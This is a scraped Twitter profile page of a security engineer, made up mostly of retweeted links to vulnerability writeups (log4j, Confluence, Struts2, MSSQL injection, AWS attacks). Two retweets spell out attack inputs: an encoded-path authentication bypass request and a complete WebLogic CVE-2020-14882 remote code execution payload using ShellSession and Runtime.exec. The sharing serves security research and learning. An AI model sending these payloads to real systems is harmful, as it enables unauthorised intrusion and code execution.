Mahendra Thanniru retweetledi
Mahendra Thanniru
283 posts

Mahendra Thanniru
@Mah1ndra_
Security Engineer
Hyderabad, India Katılım Haziran 2016
4.1K Takip Edilen239 Takipçiler
Mahendra Thanniru retweetledi

We wrote up a summary on the log4j 0-day that was found earlier today. This is going to be fun for a lot of people scrambling to patch this tonight! lunasec.io/docs/blog/log4…
English
Mahendra Thanniru retweetledi
Mahendra Thanniru retweetledi

Here's our writeup of CVE-2021-26084 Confluence RCE now that it's out in public. Although, there are still a few mysteries to be solved. cc: @rootxharsh
github.com/httpvoid/write…

English
Mahendra Thanniru retweetledi

Yesterday at @ForAllSecure FuzzCon I mentioned I'd put on a free fuzzing course online if there is enough interest. If you are interested, email info@forallsecure.com. RT appreciated for awareness. #FuzzCon #hacking #defcon29
English
Mahendra Thanniru retweetledi

2021 = more writeups! 🎉
Check out my new @GoogleVRP writeup about stealing any private @YouTube video:
bugs.xdavidhu.me/google/2021/01…
English
Mahendra Thanniru retweetledi

For red teams and pentesters, and defenders wanting to know attacks to look for and protect against, I've written down the techniques I would use to attack AWS environments.
tldrsec.com/blog/lesser-kn…
English
Mahendra Thanniru retweetledi

#CVE-2020-17530 (S2-061) Struts2 OGNL Expression Remote Code Execution @pwntester nice find!👍
GIF
English
Mahendra Thanniru retweetledi

Ran into a neat authentication bypass via extension whitelist today with @bbuerhaus and @_specters_:
GET /admin%2ejsp%3b.png
Was able to turn a number of post-auth SQL injections into pre-auth vulns. Always fun messing with these. 😁
English
Mahendra Thanniru retweetledi

I've just added an API routes wordlist containing 953011 possible API paths from the HTTPArchive dataset. Download it at wordlists.assetnote.io - all paths which start with "/api/", "/v1/", "/v2", or "/rest/". Good luck hacking! Thanks for requesting this, hope it helps.
English
Mahendra Thanniru retweetledi

💉Advanced MSSQL Injection Tricks💉
🩸 New DNS Out-Of-Band vector in SELECT statement
🩸 Quick exploitation: Get all table data in one query
🩸 Read local files in SELECT statement
and more!
Read the article: swarm.ptsecurity.com/advanced-mssql…
English
Mahendra Thanniru retweetledi
Mahendra Thanniru retweetledi
Mahendra Thanniru retweetledi

#CVE-2020–14882 Weblogic Unauthorized bypass RCE
http://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal
POST:
_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)
testbnull.medium.com/weblogic-rce-b…



English

It was Really fun playing. Thank you @hackthebox_eu #hbg for making such an awesome content as always. I would recommend everyone to give it a try.

English
Mahendra Thanniru retweetledi










